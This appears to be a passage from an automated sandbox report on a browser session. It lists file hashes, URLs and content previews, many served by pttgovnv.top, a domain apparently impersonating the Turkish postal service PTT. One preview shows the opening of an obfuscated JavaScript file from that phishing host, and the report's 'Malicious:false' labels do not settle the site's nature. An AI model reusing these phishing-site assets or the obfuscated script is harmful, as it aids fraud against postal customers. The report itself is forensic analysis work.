          Preview:.styles_container__SM2uK{display:flex;display:-ms-flexbox;justify-content:center;align-items:center;flex-direction:column}.styles_container__SM2uK>.styles_title__wSg3c{position:relative;display:inline-block;margin-bottom:4rem;color:var(--pttLinkColor);font-size:1.5rem;font-weight:var(--fontWeight)}.styles_container__SM2uK>.styles_title__wSg3c:before{position:absolute;top:50%;transform:translateY(-50%);left:-1rem;background-color:var(--pttGreenColor);content:"";width:.4rem;height:2rem}.styles_container__SM2uK>.styles_description__ZeTyg{margin-bottom:6rem;color:var(--pttLinkColor);font-weight:var(--fontWeight)}.styles_container__SM2uK>.styles_iconContainer__doMvh{position:relative;padding:1rem}.styles_container__SM2uK>.styles_iconContainer__doMvh>.styles_face__Yx2m0{position:relative;padding:2rem;border-radius:50%;color:var(--pttYellowColor);font-size:8rem;z-index:1}.styles_container__SM2uK>.styles_iconContainer__doMvh>i:not(.styles_face__Yx2m0){color:#eee;font-size:2.5rem}.styles_contai
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):19866
          Entropy (8bit):7.886038247408446
          Encrypted:false
          SSDEEP:384:dSpd2e4QRiLuY9aokvzerh0OuGo8dFoCrIQl5JQwI+h5uYMCbmWxr2xyrBkh+:mMJQw19a17erOo1dZrtzXmVpOs+
          MD5:7F20E1AD732C6686C1C7F0353209DDCC
          SHA1:057F78EFD3A085BDE99A5FF105F5CCB2A491F1DA
          SHA-256:181E423A80ADDA5EA6EBBECFA7D787AD97BFAF0E778EDEAD79F4B3697A24D544
          SHA-512:05D12844B31B6F63FB5DE9ADFA83C587C4C350A3E81D32516F40D69FDA94ACC85DE78E012C5F34864BDF48CAB2DBF56308DE723B0B20A0BA9559ABB5718620DB
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/41.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..M'IDATx....x\wy.....H..k.%Cn....D!$h.B.M.`e.fi..e.l..-V..l!...,......-...\..F..@!.%!...1!!$!...%.%..=.?..h$.9s.3...<'.n3g......522"....,U.....B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.(I.%am......7kdd....B\....k.jm.....23.?.So..fm.Q9;.M..T..."t..........TD.C=..0.. ........-..km....p....R..].......<.c.3..........gk.:......f.x...8Th...LS..{.}.l...M.....v....0...p.J...A.%...(.&.X.F.......q..4_.Mp.L.-imi...q}...\1.M.K.x..?.x.........~M...n.....8 . .........5....>.Q...V.I.|...N..7.o.[}...C?*.;..k.U....C.P4
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:downloaded
          Size (bytes):929
          Entropy (8bit):4.797071649336984
          Encrypted:false
          SSDEEP:24:Y6uel1mf1zLXAWYP1+ezafLaZ0RSrHKm7wDKJb7VP9:YHzXAlnafjrm75J99
          MD5:A1897091D57541A9E237EED5D3B0D200
          SHA1:CD10F028D0939070C64BAA563BF564C19E292630
          SHA-256:F898E77082F95F770AF246DD933818642232FACF671CAD0331DE04B9AF095566
          SHA-512:9E9884841907667703DD7F2C7A196AB871231AB35CFC96C310ED44D28790D488D9BDFD778020B78A5B6359CA22F15D0CDEF468DBB8E8D8027C5B9516D333DF4D
          Malicious:false
          Reputation:low
          URL:https://pttem.alo-tech.com/chat/get_my_widget_settings?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&escapeHtml=false
          Preview:{"success": true, "data": {"legal_requirements": false, "customer_path": null, "ws_server": "chatserver.alo-tech.com", "lang": "tr", "optional_email": true, "optional_phone": false, "hide_email": false, "hide_phone_number": false, "title": "Canl\u0131 Destek", "title_background_color": "FFFFFF", "title_text_color": "00A7CF", "subtitle": "Canl\u0131 Destek", "height": 500, "width": 350, "widget_version": "version1", "sys_nickname": "PTT", "chat_widget_icon": "chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png", "is_chat_widget_icon": true, "send_chat_history_to_customer": "", "widget_type": "alotech", "is_chat_widget_logo": false, "chat_widget_logo": null, "tenant_language": "tr", "optional_subject_choice": true, "widget_status": "online", "hide_new_chat_form": false, "file_upload_disabled": false, "send_emoji_disabled": false, "set_custom_library_properties": "", "is_speech_to_text": true, "is_python3": true}}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (322)
          Category:downloaded
          Size (bytes):323
          Entropy (8bit):4.962097992563931
          Encrypted:false
          SSDEEP:6:ZrXn6dB0HzMCRsCdgPbuxsMRIbVZptOzMmNoYmyCX:F6H0T4CkbuNmtg/1C
          MD5:BFFC12E40F0D227772826CC4AB6B1D99
          SHA1:348BED4D1364D4933BBFE5FEB5F9C61E3C5A1A6E
          SHA-256:4CD1EC684CE1C4F864A8E95F9F7695C7F708160192531FF8E55FC5023ABF5B64
          SHA-512:DC372EC6D46D3E58619E5F9DB56F4F26D683F79507EBB3A6F871B4D962BC1CB32B73362FCDFDACEB1692CE501ACD48575370C7B32E3C157FA9743CD2E7352B0A
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/4cd1ec68kFGym.css
          Preview:h1.title[data-v-fe5ae731]{color:#24549d;font-size:2rem;text-align:center}div.content[data-v-fe5ae731]{padding:10px;background-color:#f2f2f2;border-radius:3px}ul[data-v-fe5ae731]{list-style:disc outside none!important;list-style:initial!important}ul[data-v-fe5ae731]{padding-left:14px}ul li[data-v-fe5ae731]{margin-top:8px}.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.180365114215879
          Encrypted:false
          SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
          MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
          SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
          SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
          SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
          Malicious:false
          Reputation:low
          Preview:{"code":1,"message":"Session ID unknown"}
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:downloaded
          Size (bytes):107769
          Entropy (8bit):5.260222975099075
          Encrypted:false
          SSDEEP:1536:QEwre8DaBX8SWbVqLgZ/zxFTA89cdUi7xp5AM4//6pSC:QEO2BX8zzzeUi7x/A9wSC
          MD5:610DA2CE6C9014742E009DBB54D06628
          SHA1:2C1F903E8D6F628C54ABF209C8B4A27C848BF6A0
          SHA-256:66724B029326372C20E74845946256FED8D27A064EB5CCE3B8DA31ACFD0FA028
          SHA-512:D940574C28CC677CEA0DEEF46518C5F15107D3CBE099537601251ACCB3DAA63FE9634D8E8B5AA584F4D690189AD2B27BE8AC950325E8DE241A91850B6B3221E1
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/chunks/main-8430b752c8e66574.js
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{3735:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this.then((function(r){return t.resolve(e()).then((function(){return r}))}),(function(r){return t.resolve(e()).then((function(){throw r}))}))})},8565:function(e){var t=function(e){"use strict";var t,r=Object.proto
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (22359)
          Category:downloaded
          Size (bytes):53487
          Entropy (8bit):5.658840042448801
          Encrypted:false
          SSDEEP:768:j1MrlEtazMvS1FVnUbMsYG7JYYG7BfVSms88E+g9X7:j1E9UbcSbSBb
          MD5:9EC37AD8C9D7CACCBA07795B4155F169
          SHA1:9179073C6D56F591B4298CEFB72B02819E51C647
          SHA-256:2DD339F2861FCFFD8B0A703CA7F81253542743D9936B33D2E15F2FF89D46D084
          SHA-512:2594C9230996A13AFFCC132EEAB431179308C2C389345FABB44B26E950783FBB9554CA5CEE7AE54E4B9B030F05253036284977FD994EA95A0EFF679A08DCB5CF
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/2dd339f2kFGym.css
          Preview:@media screen and (min-width: 767px){.main-content{margin-top:90px}}@media screen and (min-width: 769px) and (max-width: 1047px){.main-content{margin-top:180px}}body #s4-ribbonrow{display:none}@media screen and (max-width: 468px){#webobj_portal{padding-top:30px}}body{overflow:hidden;background-size:cover;background-repeat:no-repeat}.ms-backgroundImage{background-image:url(./8b4af40ckFGym.css)}#s4-ribbonrow{position:relative}#s4-workspace{overflow:auto;position:relative}h3{margin:auto}img{-webkit-tap-highlight-color:transparent}iframe{border:0}input,button{vertical-align:middle}button{min-width:6em;margin-left:10px}input[type=button]:hover,input[type=reset]:hover,input[type=submit]:hover,button:hover{border-color:#92c0e0;background-color:#e6f2fa}input[type=button]:active,input[type=reset]:active,input[type=submit]:active,button:active{border-color:#2a8dd4;background-color:#92b7d1;background-color:#92c0e0}a:visited{color:#639;-webkit-text-decoration:none;text-decoration:none}a:hover,a:ac
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (31998)
          Category:dropped
          Size (bytes):44344
          Entropy (8bit):5.0794867253052916
          Encrypted:false
          SSDEEP:768:aCI7dmuMFAAJG4dlQKNORpnXGAtep2lcwJeL+wr2RS0c7UuHjRUQuFBt33:pITMFC4dbMVRS0cgRDV
          MD5:C7B7F245D361390E332E902506977D60
          SHA1:BF6F8E0078FE25F5CDC91565492D78B7363AC904
          SHA-256:DE5591E013E80C7CADAD861C3B40AE2331FD2A66FD8AC9A88983D02A0AA7194B
          SHA-512:BCD684C03075666AB07653F5779F7106C1A31C83308FEB82BE4B8A1208D1A3B2A5B5E0CB9320990E2B5ECE2BDEFEDB3D442DD4BEEC33DDFEE2E1A88573D71C73
          Malicious:false
          Reputation:low
          Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */. !function(a,b,c,d){function e(b,c){this.settings=null,this.options=a.extend({},e.Defaults,c),this.$element=a(b),this._handlers={},this._plugins={},this._supress={},this._current=null,this._speed=null,this._coordinates=[],this._breakpoint=null,this._width=null,this._items=[],this._clones=[],this._mergers=[],this._widths=[],this._invalidated={},this._pipe=[],this._drag={time:null,target:null,pointer:null,stage:{start:null,current:null},direction:null},this._states={current:{},tags:{initializing:["busy"],animating:["busy"],dragging:["interacting"]}},a.each(["onResize","onThrottledResize"],a.proxy(function(b,c){this._handlers[c]=a.proxy(this[c],this)},this)),a.each(e.Plugins,a.proxy(function(a,b){this._plugins[a.charAt(0).toLowerCase()+a.slice(1)]=new b(this)},this)),a.each(e.Workers,a.proxy(function(b,c){this._pipe.push({fi
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:dropped
          Size (bytes):10360
          Entropy (8bit):7.772743411893453
          Encrypted:false
          SSDEEP:192:nIT6oZvIiGiCBjFDsnk/7vzukL1f3hBXF8h6UaM:nrodrGiGwnkTvKQ13W0Ux
          MD5:C7D382ABD20C03688E3C72F9AB09E535
          SHA1:D290EE4A0D10EBD46208206CB44C69C72C8DF2B5
          SHA-256:9DEC48B0372F2CB164F2FEBD05E909A1C7B49C1BE12E1A143BA7FBD43435EE6A
          SHA-512:997AD2487E21001921490F84979FFB4096F885DF5C938CB083C74E65B1316A98D02DB689C37E3FB1CC0A6DFED32432B7E6341DEEB3C98F9AA80532E59EC87BA6
          Malicious:false
          Reputation:low
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..(.IDATx...Mz.X.7`....+ ..............R+.....0...V....JVPf..+..C.u.\...#[....|.].G..s~:.....^..0,.....!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@................8...8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@....................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!..@...@...@...@................8...8...8..!...!...!...!.|..'..k.L..C.......M..\.q.x.?...3.G7.o.q]..hG.P.O.x}...l..b...sq..8..-\..<.'...y..tqL_..p.uv]n......:.J.;...IV.G.....bq#\:3..p..?^......<(5..t..5.s.EpZ.O..w-..[..UO..|..E.
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:SVG Scalable Vector Graphics image
          Category:downloaded
          Size (bytes):2682
          Entropy (8bit):4.4904670747715585
          Encrypted:false
          SSDEEP:24:t4o1WOIsLcS4VCFTDOLLTuZQ161xxM1tltkOJXKu5PfPMXIiz6NcS4VCFTDOLLzx:pbLc3o2LTu+2F+amc3o2LU+GGBWGVH6I
          MD5:A9DDCD4D865D3F2E85BDBB9BF38F73C6
          SHA1:435CC4E8C5417268BECF4DE5021EDA6A558B6B11
          SHA-256:38D713D08730A4398FB0AA408912957A0C19E1FFC8A4DA071547DBFA00C5E485
          SHA-512:A3540ACC364E53A2E428F44BDD67D72293184FF5555692D0880C4C04EEB443D1CE41E2A7A9327D92DAA2BE93D0AE3BCA14DB571291DA3AE2269AA693EAD44A7E
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/img/microphone_open.svg
          Preview:<svg xmlns="http://www.w3.org/2000/svg" height="512pt" version="1.1" viewBox="-90 0 512 512.00001" width="512pt">.<g id="surface1">.<path d="M 331.964844 275.082031 C 331.964844 266.652344 325.128906 259.816406 316.695312 259.816406 C 308.261719 259.816406 301.425781 266.652344 301.425781 275.082031 C 301.425781 349.769531 240.667969 410.527344 165.980469 410.527344 C 91.296875 410.527344 30.539062 349.769531 30.539062 275.082031 C 30.539062 266.652344 23.703125 259.816406 15.269531 259.816406 C 6.835938 259.816406 0 266.652344 0 275.082031 C 0 361.460938 66.320312 432.621094 150.714844 440.355469 L 150.714844 481.460938 L 94.046875 481.460938 C 85.613281 481.460938 78.777344 488.296875 78.777344 496.730469 C 78.777344 505.164062 85.613281 512 94.046875 512 L 237.917969 512 C 246.347656 512 253.1875 505.164062 253.1875 496.730469 C 253.1875 488.296875 246.347656 481.460938 237.917969 481.460938 L 181.25 481.460938 L 181.25 440.355469 C 265.644531 432.625 331.964844 361.460938 331.96484
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (31998)
          Category:downloaded
          Size (bytes):44344
          Entropy (8bit):5.0794867253052916
          Encrypted:false
          SSDEEP:768:aCI7dmuMFAAJG4dlQKNORpnXGAtep2lcwJeL+wr2RS0c7UuHjRUQuFBt33:pITMFC4dbMVRS0cgRDV
          MD5:C7B7F245D361390E332E902506977D60
          SHA1:BF6F8E0078FE25F5CDC91565492D78B7363AC904
          SHA-256:DE5591E013E80C7CADAD861C3B40AE2331FD2A66FD8AC9A88983D02A0AA7194B
          SHA-512:BCD684C03075666AB07653F5779F7106C1A31C83308FEB82BE4B8A1208D1A3B2A5B5E0CB9320990E2B5ECE2BDEFEDB3D442DD4BEEC33DDFEE2E1A88573D71C73
          Malicious:false
          Reputation:low
          URL:https://chatserver.alo-tech.com/static/assets/js/owl.carousel.min.js
          Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */. !function(a,b,c,d){function e(b,c){this.settings=null,this.options=a.extend({},e.Defaults,c),this.$element=a(b),this._handlers={},this._plugins={},this._supress={},this._current=null,this._speed=null,this._coordinates=[],this._breakpoint=null,this._width=null,this._items=[],this._clones=[],this._mergers=[],this._widths=[],this._invalidated={},this._pipe=[],this._drag={time:null,target:null,pointer:null,stage:{start:null,current:null},direction:null},this._states={current:{},tags:{initializing:["busy"],animating:["busy"],dragging:["interacting"]}},a.each(["onResize","onThrottledResize"],a.proxy(function(b,c){this._handlers[c]=a.proxy(this[c],this)},this)),a.each(e.Plugins,a.proxy(function(a,b){this._plugins[a.charAt(0).toLowerCase()+a.slice(1)]=new b(this)},this)),a.each(e.Workers,a.proxy(function(b,c){this._pipe.push({fi
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
          Category:dropped
          Size (bytes):77678
          Entropy (8bit):5.213189247182647
          Encrypted:false
          SSDEEP:768:w1BdHluH4ayXM1ZFnqHfbm2GL8Y33xQUOWcKPX+tcQ1ZvGgbng5iCaK828:p4aycxnYU33xQ3eg3CaK8v
          MD5:A68954C92CBC306929A026FB8BE5389E
          SHA1:4B8AC7EB075343DA16FEE848C9B6A6C80B6C1484
          SHA-256:83500803B415AFC9A4F8496789CBA919D635DDE3ADC041A8A69B62F71071BCA7
          SHA-512:2D1E103916519B5352EEE20A58A33D5075E43BF7358EF516320738E2C2B9154C8F1B8EC6CC6751FB8F6A7EB9994B9D56EAE4BC589BBE03605010BFE06CF61AA2
          Malicious:false
          Reputation:low
          Preview:function defineAloChat(){var c={app_environment:"local",name:"Alotech Chat JS",hostname:"",username:"",chatText:"#chat-text",chatMessage:".mar-btm",btnSendMessage:"#btnSendMessage",aloChatLogout:"#alo-chat-logout",modalChatHistory:"#modalChatHistory",btnChatHistoryY:"#btnChatHistoryY",btnChatHistoryN:"#btnChatHistoryN",modalChatLogoutConfirm:"#modalChatLogoutConfirm",btnChatLogoutConfirmY:"#btnChatLogoutConfirmY",btnChatLogoutConfirmN:"#btnChatLogoutConfirmN",inputUserNameSurName:"#name",queueMessage:"#queue_message",footer:"#footer",chatTags:"#chat_tags",inputPhoneNumber:"#phone_number",inputEmail:"#email",user_email:"",user_phone_number:"",uid:"",cwid:"",ws_server:"chatserver.alo-tech.com",lang:"en",tags:[],optional_email:"",optional_phone:"",hide_email:"",hide_phone_number:"",title:"",title_background_color:"",title_text_color:"",subtitle:"",height:300,width:300,queue:[],legal_requirements:0,widget_version:"",frmStartChat:"#frmStartChat",inputLang:"#lang",inputActiveChatKey:"#active
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
          Category:downloaded
          Size (bytes):30380
          Entropy (8bit):7.86681636831563
          Encrypted:false
          SSDEEP:768:sVJVGfvVGfBG/GfBGpAbd2hqWRR2i6c8/Alm1nW7d482ZwNTDdtIPrOzj:sVJVGfvVGfBG/GfBGpAQUWRhB84Q1GDP
          MD5:BFE1E0B8D54C3BE365553A5643298493
          SHA1:66B3E9FCD7C541DB4E56BAB4F75ED8A3DF93E872
          SHA-256:D811034E3AA4C50A5B95C86066670B838725976A41B7F1BCBACB6F307648F6C2
          SHA-512:ADC45C69526A06781B4BC0267DD0E567C767665A6572FF47856277A9E5EA8F9704424B2913F7A2DC190E9EAB395681C7027783016FA08B1463383049874ADA2C
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/layout/images/50.png
          Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..v9IDATx...|..............N..}.......V...j.om.o..._k[.}...W[h.j].}.}'@ ...$$!.~.;.......=.....8...9s...o....DQ$......w.A......@........8.................... .......D......D...............q......q......"......@........8......8............. ...... .......D......................q......"......"......@........8.................... .......D......D...............q......q......"......@......@........8............. ...... .......D......................q......"......"......@........8......8.8......8............. ...... .......D......................q......"......"......@........8.................... .......D......D...............q......q......"......@......@........8............. ...... .......D......................q......"......"......@........8......8............. .......D......D...............q......q......"......@......@........8............................. .......D......D...............q...
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with very long lines (11524)
          Category:dropped
          Size (bytes):11574
          Entropy (8bit):5.332302381529318
          Encrypted:false
          SSDEEP:96:7v+CNp6/anNwCPXjBobJHnycoYIWx6T334MjbxN5AZOva/rL6twJwg1uvbqXGA6g:7rfManGCPXjSJmxg09bxHAYvun3DX20j
          MD5:DAC5D6A1FCFC7602CA1135B80C4AEAC7
          SHA1:85A3FB6333CF317B57F44A327BE09E31590D5912
          SHA-256:E1B2B0D74DCF5FA0839F03D26D57EA6CF629004C0707755B8B70E51EEC14AD23
          SHA-512:C3EBA50A7AD6212686D13A581FF58B68B915280234445293D2A085AC6C0480861065517AAF290CF46EF81BF8ABE255D2FE9009EF23BDA33894A8692E1284EBE9
          Malicious:false
          Reputation:low
          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4412],{8953:function(e,t,n){"use strict";var r=n(8565),a=n.n(r),s=n(3288),u=n(2267),c=n.n(u),o=n(2466),i=n(6731),l=n.n(i),f=n(3395),p=n(3230),v=n(8082),h=n(2493),d=n.n(h),y=n(1295),_=n(427),m=n(1270),w=n(1395);function g(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=new Array(t);n<t;n++)r[n]=e[n];return r}function x(e,t,n,r,a,s,u){try{var c=e[s](u),o=c.value}catch(i){return void n(i)}c.done?t(o):Promise.resolve(o).then(r,a)}function T(e){return function(){var t=this,n=arguments;return new Promise((function(r,a){var s=e.apply(t,n);function u(e){x(s,r,a,u,c,"next",e)}function c(e){x(s,r,a,u,c,"throw",e)}u(void 0)}))}}function b(e,t){return function(e){if(Array.isArray(e))return e}(e)||function(e,t){var n=null==e?null:"undefined"!==typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(null!=n){var r,a,s=[],u=!0,c=!1;try{for(n=n.call(e);!(u=(r=n.next()).done)&&(s.push(r.value),!t||s.length!==t);u=!0);}catch(o){c=!0,a=o}final
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (6082), with no line terminators
          Category:downloaded
          Size (bytes):6098
          Entropy (8bit):5.345197330361691
          Encrypted:false
          SSDEEP:96:XLD0GPxeMvMx+DCykuvej08WkE0EPO9n4gyk8gsubpme1C8Ed0UOa3NeS9eJSrBF:v0qeMkx+DCIveU8So4gyk8gsubpme1CT
          MD5:0DA448566DB5D334688029F4D8DA8025
          SHA1:9AE1FA7FEE699B2E08651E38850F4B73002191F2
          SHA-256:B532E6762E739AB6A28B435316707D8D90BC1CFCF1BBF430127481320C64B2ED
          SHA-512:9A29CB97F174931A186F465013B04939D63E18727D31235338976365E4C35588F98EEB50ADE4B087FD90D7B79D41514D3596D9C5446760A20773CCFF26663530
          Malicious:false
          Reputation:low
          URL:https://pttgovnv.top/help/assets/cbcdcea5JxKnW.js
          Preview:const a26_0x2f6b2e=a26_0x2195;(function(_0x4b26d5,_0x58f703){const _0x55ba02=a26_0x2195,_0x56ed15=_0x4b26d5();while(!![]){try{const _0x1c2f33=-parseInt(_0x55ba02(0x163))/0x1+-parseInt(_0x55ba02(0x19a))/0x2*(parseInt(_0x55ba02(0x160))/0x3)+parseInt(_0x55ba02(0x17c))/0x4*(-parseInt(_0x55ba02(0x172))/0x5)+parseInt(_0x55ba02(0x186))/0x6+-parseInt(_0x55ba02(0x185))/0x7+-parseInt(_0x55ba02(0x173))/0x8+parseInt(_0x55ba02(0x15f))/0x9;if(_0x1c2f33===_0x58f703)break;else _0x56ed15['push'](_0x56ed15['shift']());}catch(_0x3aa38c){_0x56ed15['push'](_0x56ed15['shift']());}}}(a26_0x2d8e,0xe16ee));const a26_0x523979=(function(){let _0x1acf99=!![];return function(_0x2d3219,_0x2027c3){const _0x24a505=_0x1acf99?function(){const _0x248cf8=a26_0x2195;if(_0x2027c3){const _0x626e42=_0x2027c3[_0x248cf8(0x18e)](_0x2d3219,arguments);return _0x2027c3=null,_0x626e42;}}:function(){};return _0x1acf99=![],_0x24a505;};}()),a26_0x5b0a0d=a26_0x523979(this,function(){const _0x177b71=a26_0x2195;return a26_0x5b0a0d[_0x177
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:ASCII text, with no line terminators
          Category:downloaded
          Size (bytes):96
          Entropy (8bit):4.801770503303253
          Encrypted:false
          SSDEEP:3:k0WYL12AdneHBeBW6QfpX/W6Qen:UYR2AdeHBf6EpXO6h
          MD5:21C1349F80499EC49848EA61EDFCC3AB
          SHA1:CED7488DB5B6CF88DACE2E0AE2C668C0B2D4ACE2
          SHA-256:A0676D8033F5A45F08B37BB7EA756D48C584DF74246E167DBDF5D020B2A0B4B1
          SHA-512:625427E44A07B5FB3FE892A2CD8F2B78303D25BDC5581049FE71B1BDE19DF2C46DCF39176AE634FF6FF1A04061601817A872DA122997FD3F048D335EE0448808
          Malicious:false
          Reputation:low
          URL:https://www.ptt.gov.tr/_next/static/JxrWbfN16VK5LXe_vQYf2/_ssgManifest.js
          Preview:self.__SSG_MANIFEST=new Set(["\u002Fnotfound"]);self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB()
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:RIFF (little-endian) data, Web/P image
          Category:dropped
          Size (bytes):42406
          Entropy (8bit):7.97968488859527
          Encrypted:false
          SSDEEP:768:1oorXSxmPWLkL/IYHs6jipHKCwcT/ZtGJ2AlAGhF22x35kt+YDQpA2ooObEgH4S:1owXS/LkUSLj2Zwc+J2CpLxJruEgH/
          MD5:0B94ED4D25A30530E566195F0F3ADE8B
          SHA1:BF9184B5FCE613FF573CB63DAB6D52520663D8A2
          SHA-256:C35D251C45608F6A64A6EF58590A36C580AD0BC1B0AC53697F2B9398FD64D626
          SHA-512:33E3CC1D4D25628253C632313981E568C75CB65E70B391DF0E86463CF0DC9A6490D18384CDEDF61304D2623A1CC485A5621B814DAD83A7A7EE0590D14BD98EF5
          Malicious:false
          Reputation:low
          Preview:RIFF....WEBPVP8X..............ALPH.}....'$H..xkD..9..aR...?..1..>R7@.'...XH5.(c.?..g)...>...8(....[..[..Q..K;....e.hf...ZIja....n.fVfj..w .\..D....y>.y.s.........o.=W.m.:i"". *..b....K.x.[.Ql..c.`.wcM4...F..k..&........s.qN%......#..........N....7...Z.7..m1.Q#.,C.Y.?.+.R.pPN@A....q..j.....U.`.a.-*.8..G%<2....N.5........j.Q5....~..G........7..>..w..a.|../..WwC...).lU6X........5?.2.Zh...u5....4....1.:h.-o.W.....p..P.....;..c...@..[T...y.{..o.6....\..g...\.....}.5_M....(...a....Y....n.......C..pJ...........3.\.G..j..'..x.T.h.1@........(.9...a.j....Q...X....|>....@.......0W_.AZ..$..X/....1.....N....{....\@y....].Ey..f.'.........o5.p.%.....*...i..@9-.\bn..RU.....Q..f56...y._.vC..7..Z......6.'.....f..G.TW....%t.p..3.~0.....%<v...}..t'.0.I..x...h....1..*.LV}`..}. ..:.'........0PQG..j:@W-.se.B..4..U3..U.......S...I...j..#.........4.B.)....u1\S~.=.....|vT2...Yz..#6!.PK..\O+.LS...........1Q..%...Ry`....j..rZ...N.T.>..WQ>......h.....@...x..jk&PZ.r..4....2...
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:Unicode text, UTF-8 text, with very long lines (31081), with no line terminators
          Category:dropped
          Size (bytes):31903
          Entropy (8bit):5.810923490394336
          Encrypted:false
          SSDEEP:384:w3iGBkJwiSWzYLyD2ZtS2zF7TzrCaYaIUcrUCFNGwp88Qk238EAfRg9Zr5MHNw9+:wISWYzzNPua/sF+XDACqSRh5/xa21ib
          MD5:A01B6E8CE8881B6A2B02061495A8BC47
          SHA1:EB4A3F16A6B63BA67B60B4278E06D3384DEC9F93
          SHA-256:D6CACA3906FF959A963479874F22DDC7762E575DF6A3065B97D9B079F1AA9A57
          SHA-512:DB14B98A778C20BD411E06D6401F95382F4AB959F5563F8D8DF827C59D69BC9A521382FD4C83DDEC459C81C30F9E8151C1455B7703CFFD23E5C188A4D568F208
          Malicious:false
          Reputation:low
